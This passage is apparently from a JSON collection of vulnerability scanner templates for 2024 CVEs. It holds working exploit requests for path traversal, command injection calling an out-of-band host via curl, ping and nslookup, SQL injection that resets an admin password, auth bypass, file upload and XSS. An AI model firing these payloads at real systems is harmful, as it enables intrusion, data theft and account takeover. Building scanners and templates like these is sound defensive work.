application/json\n\n{\"tiles\":[{\"uuid\":\"00000000-0000-0000-0000-000000000000\",\"x\":0,\"y\":0,\"h\":9,\"w\":15,\"type\":\"markdown\",\"properties\":{\"title\":\"title\",\"hideTitle\":false,\"content\":\"<iframe src=\\\"http://{{interactsh-url}}\\\">frame</iframe>\\n\\n<img src=\\\"http://{{interactsh-url}}\\\">img</img>\\n\"}}],\"filters\":{\"dimensions\":[],\"metrics\":[],\"tableCalculations\":[]},\"name\":\"my dashboard\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"status\":\"ok\""],"internal":true}]},{"raw":["POST /api/v1/dashboards/{{dashuuid}}/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"queryFilters\":\"\",\"gridWidth\":1400}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"http\")","contains(interactsh_request, \"connect.sid=\")","contains(body, \"status\\\":\\\"ok\")"],"condition":"and"}]}]},{"id":"CVE-2024-23334","info":{"name":"aiohttp - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["aiohttp","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4358","info":{"name":"Progress Telerik Report Server - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /Startup/Register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUsername={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}\n","POST /Token HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=password&username={{user}}&password={{pass}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains_all(body_2, \"access_token\", \"userName\", \"token_type\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"token","part":"body_2","group":1,"regex":["\"access_token\":\"([A-Z0-9a-z_-]+)\""],"internal":true},{"type":"dsl","dsl":["\"Username: \"+ user","\"Password: \"+ pass"]}]}]},{"id":"CVE-2024-38856","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/main/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22319","info":{"name":"IBM Operational Decision Manager - JNDI Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"patchLevel\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24809","info":{"name":"Traccar - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /api/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{name}}\", \"email\": \"{{email}}\", \"password\": \"{{password}}\", \"totpKey\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"administrator\":","\"fixedEmail\""],"condition":"and","internal":true}]},{"raw":["POST /api/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\n\nemail={{email}}&password={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceReadonly\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{unique}}\", \"uniqueId\": \"{{unique}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"calendarId\"","\"groupId\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".id"]}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"extractors":[{"type":"regex","part":"body","name":"filename","internal":true,"regex":["device\\.([a-zA-Z]+)"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /api/devices/{{value}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": {{value}}, \"attributes\": {\"deviceImage\": \"device.png\"}, \"groupId\": 0, \"calendarId\": 0, \"name\": \"test\", \"uniqueId\": \"{{unique}}/../../../../../opt/traccar/modern\", \"status\": \"offline\", \"lastUpdate\": null, \"positionId\": 0, \"phone\": null, \"model\": null, \"contact\": null, \"category\": null, \"disabled\": false, \"expirationTime\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceImage\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]}]},{"id":"CVE-2024-7354","info":{"name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/ninja-forms"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-submissions&\"><script>alert(document.domain)</script>=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-20767","info":{"name":"Adobe ColdFusion - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1\nHost: {{Hostname}}\n","GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1\nHost: {{Hostname}}\nuuid: {{extracted_uuid}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'wddxPacket')","contains(header_2, 'application/json')","contains(body_2, '/bin/bash')"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"extracted_uuid","group":1,"regex":["<var name='uuid'><string>(.*)</string>"],"internal":true}]}]},{"id":"CVE-2024-45241","info":{"name":"CentralSquare CryWolf - Path Traversal","severity":"high"},"requests":[{"raw":["GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Powered by CryWolf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /gdoc1.ashx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type,\"application/pdf\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-46627","info":{"name":"DATAGERRY - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/users/1/settings/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"response_type\":","\"model\":","\"time\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-36527","info":{"name":"Puppeteer Renderer  - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21887","info":{"name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","severity":"critical"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"result\":","\"message\":"],"condition":"and"}]}]},{"id":"CVE-2024-22024","info":{"name":"Ivanti Connect Secure - XXE","severity":"high"},"requests":[{"raw":["POST /dana-na/auth/saml-sso.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLRequest={{base64(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-39914","info":{"name":"FOG Project < 1.5.10.34 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfogguiuser=fog&nojson=2\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"No HTML files!\",\"HTMLDOC\")","contains(content_type, \"application/pdf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /management/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4443","info":{"name":"Business Directory Plugin <= 6.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,6,0))+))--+-][1]= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"Business Directory\",\"No listings found\")"],"condition":"and"}]}]},{"id":"CVE-2024-4836","info":{"name":"Edito CMS - Sensitive Data Leak","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")","status_code==200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/config.php","{{BaseURL}}/config/config.php","{{BaseURL}}/include/config.php","{{BaseURL}}/includes/config.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"db_password\", \"db_username\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-29272","info":{"name":"VvvebJs < 1.7.5 - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfile=demo/landing/index.php&html={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"File saved\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /demo/landing/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6670","info":{"name":"WhatsUp Gold HasErrors SQL Injection - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"KeyStorePassword\": \"{{password}}\", \"TrustStorePassword\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(set_cookie, 'ASP.NET_SessionId=')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, 'application/json')"],"condition":"and","internal":true}]},{"raw":["GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'DisplayName')"],"condition":"and","internal":true}],"extractors":[{"type":"regex","internal":true,"name":"encryptedPassword","regex":["\"psyduck\\d+(,\\d+)*\""]}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'false')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/User/LoginAjax HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&rememberMe=false\n"],"matchers":[{"type":"word","part":"body","words":["\"authenticated\":true","\"username\":\""],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /gremlin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"SL7\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"ping\\\", \\\"{{interactsh-url}}\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"inputStream\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-0235","info":{"name":"EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"_user_role=administrator","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@","status\":\"good","value=","\"content\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41628","info":{"name":"Cluster Control CMON API - Directory Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"ClusterControl\",\"CMON_API\")","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../..//etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28397","info":{"name":"pyload-ng js2py - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npackage=pkg&crypted=MTIzNA%3D%3D&jk=%0A//%20%5B%2B%5D%20command%20goes%20here%3A%0Alet%20cmd%20%3D%20%22curl%20http%3A//{{interactsh-url}}%22%0Alet%20hacked%2C%20bymarve%2C%20n11%0Alet%20getattr%2C%20obj%0A%0Ahacked%20%3D%20Object.getOwnPropertyNames%28%7B%7D%29%0Abymarve%20%3D%20hacked.__getattribute__%0An11%20%3D%20bymarve%28%22__getattribute__%22%29%0Aobj%20%3D%20n11%28%22__class__%22%29.__base__%0Agetattr%20%3D%20obj.__getattribute__%0A%0Afunction%20findpopen%28o%29%20%7B%0A%20%20%20%20let%20result%3B%0A%20%20%20%20for%28let%20i%20in%20o.__subclasses__%28%29%29%20%7B%0A%20%20%20%20%20%20%20%20let%20item%20%3D%20o.__subclasses__%28%29%5Bi%5D%0A%20%20%20%20%20%20%20%20if%28item.__module__%20%3D%3D%20%22subprocess%22%20%26%26%20item.__name__%20%3D%3D%20%22Popen%22%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20item%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%28item.__name__%20%21%3D%20%22type%22%20%26%26%20%28result%20%3D%20findpopen%28item%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20result%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%7D%0A%0An11%20%3D%20findpopen%28obj%29%28cmd%2C%20-1%2C%20null%2C%20-1%2C%20-1%2C%20-1%2C%20null%2C%20null%2C%20true%29.communicate%28%29%0Aconsole.log%28n11%29%0Afunction%20f%28%29%20%7B%0A%20%20%20%20return%20n11%0A%7D%0A%0A"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Could not decrypt key"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2024-34470","info":{"name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mailinspector/login.php"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["Licensed to HSC TREINAMENTO"]}]},{"method":"GET","path":["{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38288","info":{"name":"TurboMeeting - Post-Authentication Command Injection","severity":"high"},"requests":[{"raw":["POST /as/wapi/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnext_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login\n"],"matchers":[{"type":"word","part":"body","words":["as/wapi/profile_entry?sid="],"internal":true}],"extractors":[{"type":"regex","name":"sid","part":"body","group":1,"regex":["sid=(.*?)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /as/wapi/generate_csr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsid={{sid}}&common_name=1\"%20out%20/dev/null\"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CSR","SSL"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-32231","info":{"name":"Stash < 0.26.0 -  SQL Injection","severity":"critical"},"requests":[{"raw":["POST /graphql HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json\n\n{\"operationName\":\"FindPerformers\",\"variables\":{\"filter\":{\"q\":\"\",\"page\":1,\"per_page\":40,\"sort\":\"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -\",\"direction\":\"ASC\"},\"performer_filter\":{}},\"query\":\"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\\n  findPerformers(\\n    filter: $filter\\n    performer_filter: $performer_filter\\n    performer_ids: $performer_ids\\n  ) {\\n    count\\n    performers {\\n      ...PerformerData\\n      __typename\\n    }\\n    __typename\\n  }\\n}\\n\\nfragment PerformerData on Performer {\\n  id\\n  name\\n  disambiguation\\n  url\\n  gender\\n  twitter\\n  instagram\\n  birthdate\\n  ethnicity\\n  country\\n  eye_color\\n  height_cm\\n  measurements\\n  fake_tits\\n  penis_length\\n  circumcised\\n  career_length\\n  tattoos\\n  piercings\\n  alias_list\\n  favorite\\n  ignore_auto_tag\\n  image_path\\n  scene_count\\n  image_count\\n  gallery_count\\n  movie_count\\n  performer_count\\n  o_counter\\n  tags {\\n    ...SlimTagData\\n    __typename\\n  }\\n  stash_ids {\\n    stash_id\\n    endpoint\\n    __typename\\n  }\\n  rating100\\n  details\\n  death_date\\n  hair_color\\n  weight\\n  __typename\\n}\\n\\nfragment SlimTagData on Tag {\\n  id\\n  name\\n  aliases\\n  image_path\\n  parent_count\\n  child_count\\n  __typename\\n}\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["converting driver\\.Value type string \\(\\\\\"3.*?\\\\\"\\) to a int: invalid syntax"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33724","info":{"name":"SOPlanning 1.52.00 Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /process/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}\n","GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"attack":"pitchfork","payloads":{"username":["admin"],"password":["admin"]},"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"SOPlanning\")"],"condition":"and"}]}]},{"id":"CVE-2024-23163","info":{"name":"GestSup - Account Takeover","severity":"critical"},"requests":[{"raw":["POST /ajax/ticket_user_db.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: xmlhttprequest\nContent-Type: application/x-www-form-urlencoded\n\nmodifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success","firstname\":\"{{firstname}}\",\"lastname\":\"{{lastname}}"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}],"extractors":[{"type":"dsl","dsl":["\"Firstname: \"+ firstname","\"Lastname: \"+ lastname"]}]}]},{"id":"CVE-2024-23692","info":{"name":"Rejetto HTTP File Server - Template injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["rejetto"]}]}]},{"id":"CVE-2024-6746","info":{"name":"EasySpider 0.6.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["GET /taskGrid/tasklist.html HTTP/1.1\nHost: {{Hostname}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Task List\",\"Task ID\",\"Task Name\",\"URL\",\"<title>\u4efb\u52a1\u5217\u8868 | Task List</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /../../../../../../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-8883","info":{"name":"Keycloak - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"redir_host":["http://localhost","http://127.0.0.1","https://localhost","https://127.0.0.1","http://[::]","https://[::]"],"client_id":["security-admin-console","master-realm","broker","admin-cli","account","account-console"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["Location:\\s+https?://(localhost|127.0.0.1|\\[::\\]):\\d*@oast\\.me\\?"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-5522","info":{"name":"WordPress HTML5 Video Player < 2.5.27 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36401","info":{"name":"GeoServer RCE in Evaluating Property Name Expressions","severity":"critical"},"requests":[{"raw":["GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"extractors":[{"type":"regex","name":"typename","part":"body","group":1,"regex":["typeName=([^&\\]]+)"],"internal":true}]},{"raw":["@timeout 20s\nGET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"content_type","words":["application/xml"]}]}]},{"id":"CVE-2024-39907","info":{"name":"1Panel SQL Injection - Authenticated","severity":"critical"},"requests":[{"raw":["POST /api/v1/auth/login HTTP/1.1\nHost: {{Hostname}}\nEntranceCode: ZW50cmFuY2U=\nContent-Type: application/json\n\n{\"name\":\"{{username}}\",\"password\":\"{{password}}\",\"ignoreCaptcha\":true,\"authMethod\":\"session\",\"language\":\"en\"}\n","POST /api/v1/hosts/command/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"page\":1,\"pageSize\":10,\"groupID\":0,\"orderBy\":\"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;\",\"order\":\"ascending\",\"name\":\"a\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"SQL logic error\",\"table exp already exists\")","contains(header_1, 'psession')"],"condition":"and"}]}]},{"id":"CVE-2024-21893","info":{"name":"Ivanti SAML - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /dana-ws/saml20.ws HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\t<soap:Body>\t\t<ds:Signature\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t<ds:SignedInfo>\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\t\t\t</ds:SignedInfo>\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t\t<ds:RetrievalMethod URI=\"http://{{interactsh-url}}\"/>\t\t\t\t<ds:X509Data/>\t\t\t</ds:KeyInfo>\t\t\t<ds:Object></ds:Object>\t\t</ds:Signature>\t</soap:Body></soap:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-23167","info":{"name":"GestSup - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /ajax/calendar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=add_event&title=<img/src/onerror=alert(document.domain)>&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1\n"],"matchers":[{"type":"word","part":"response","words":["{\"event_id\":\"","text/html"],"condition":"and","internal":true}]},{"raw":["POST /index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: 